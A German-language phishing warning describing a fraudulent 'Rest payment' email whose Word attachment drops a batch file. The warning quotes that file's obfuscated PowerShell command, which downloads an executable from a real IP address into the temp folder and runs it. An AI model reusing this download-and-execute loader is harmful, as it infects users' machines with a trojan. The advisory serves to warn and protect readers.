Rest payment von Gina Tsipuria ([email protected]) lädt über eine beigefügte Word-Datei eine bösartige Software!
Am Pfingstmontag, den 21. Mai 2018 wurden durch unbekannte Dritte die folgende betrügerische E-Mail in englischer Sprache versendet. Achtung: Die E-Mail stammt nicht vom darin genannten Absender! Öffnen Sie nicht das Word-Dokument! Bereits beim Öffnen würde ohne Nachfrage ein Trojanische Pferd nachgeladen, welches den PC infiziert!
Betreff: Rest payment
Absender: Gina Tsipuria ([email protected])BEMINOR SRL
Regards
Gina Tsipuria
internationalpack.com
[email protected]
Achtung: Es handelt sich um eine betrügerische E-Mail! Klicken Sie nicht auf den Link!
Der E-Mail ist folgendes Microsoft Word – Dokument beigefügt:
21.05.18swift.doc
Öffnen Sie nicht die Datei!
Die Microsoft Word – Datei würde zwar folgenden Text anzeigen:
PLEASE ENABLE EDITING TO VIEW WITH DOCUMENT TEXT
Es handelt sich aber nicht um ein Makro. Bereits beim Öffnen der Datei wird eine „dask.bat“ – Datei auf dem Rechner erzeugt:
Die Batch-Datei hat folgenden Inhalt:
pOWerShELL „“function abc([String] $vvd){(New-Object System.Net.WebClient).DownloadFile($vvd,’%TEMP%\tte.exe‘);Start-pRoCesS ‚%TEMP%\tte.exe‘;}try{abc(‚http://185.82.200.11/0.exe‘)}catch{111110000000000000000000000000000000000000000000000000000000000000000000000000000000000000012}““
Per PowerShell wird von der IP-Adresse 185.82.200.11/0.exe eine Datei „0.exe“ nachgeladen, die als „tte.exe“ auf dem Rechner abgelegt wird.
Die Erkennungsrate für die ausführbare Datei liegt laut Virustotal bei 29/66! Führen Sie das Programm daher nicht aus!